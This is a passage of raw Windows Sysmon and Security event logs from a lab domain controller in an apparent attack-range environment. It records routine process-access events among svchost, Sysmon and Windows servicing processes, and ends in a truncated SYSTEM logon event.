07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.221\r\nSourceProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nSourceProcessId: 4976\r\nSourceThreadId: 1248\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.221","SourceProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","SourceProcessId":"4976","SourceThreadId":"1248","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:59:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220605,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon 